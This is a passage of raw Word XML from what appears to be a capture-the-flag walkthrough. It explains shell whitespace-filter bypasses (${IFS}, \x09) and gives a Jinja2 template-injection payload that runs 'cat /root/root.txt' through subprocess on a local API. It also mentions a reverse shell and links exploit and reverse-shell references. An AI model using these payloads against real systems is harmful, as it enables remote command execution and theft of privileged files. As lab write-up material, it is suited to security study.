          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">${IFS}</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using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${IFS}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a command, you are inserting the field separator defined in IFS. This can be useful to bypass issues related to whitespace or other special characters that might interfere with proper shell command interpretation.</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Another possible approach is to use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">\x09</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bypass the restriction by leveraging the hexadecimal representation of the tab character.</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access and read the final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Alternatively, if preferred, you can obtain a reverse shell 🙂</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127.0.0.1:5000/apiregister_v2 --data "username=</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{{()|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fbase\x5f\x5f')|attr('\x5f\x5fsubclasses\x5f\x5f')</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()|attr('\x5f\x5fgetitem\x5f\x5f')(202)('cat\x09/root/root.txt',shell=True,stdout=-1)</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|attr('communicate')()|attr('\x5f\x5fgetitem\x5f\x5f')(0)|attr('decode')('utf-8')}}"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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2108200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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43600" cy="2108200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId41" w:type="default"/>
      <w:headerReference r:id="rId42" w:type="first"/>
      <w:headerReference r:id="rId43" w:type="even"/>
      <w:footerReference r:id="rId44" w:type="default"/>
      <w:footerReference r:id="rId45" w:type="first"/>
      <w:footerReference r:id="rId4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2">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9"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3">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4">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10.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image10.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Register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4.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13.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.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7.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.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3.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/@nyomanpradipta120/jinja2-ssti-filter-bypasses-a8d3eb7b000f" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/wpscanteam/wpscan" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.exploit-db.com/exploits/50395" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell" TargetMode="External"/><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FJYO7C9zES7rTqjVIF7/1hG7Q==">CgMxLjAyDmgubWQ1eDI5eGxxOGRpMg5oLncxaGN6OHhqcnZmNTIOaC42Z2p5eWZ3eWl1MDIyDmgubGUzYWxjYXhkZjRvMg5oLmExbXZ2bmUzNnlsYTIOaC5ocnpqODQzMnYwczgyDWguOW5vM2hpYnh4N2IyDmgudTM5eW4ydmgzN3R5Mg5oLmw5eXk0d21yaW84bzIOaC40b3JweXZhbDk0ZGsyDmguczh5YzlmNmpveDF4Mg5oLjE3NWY1Y3M5NHowbzgAciExSVVUN3BleFhqWG5QeDhiMXI2X092OEJzMkIzcktvY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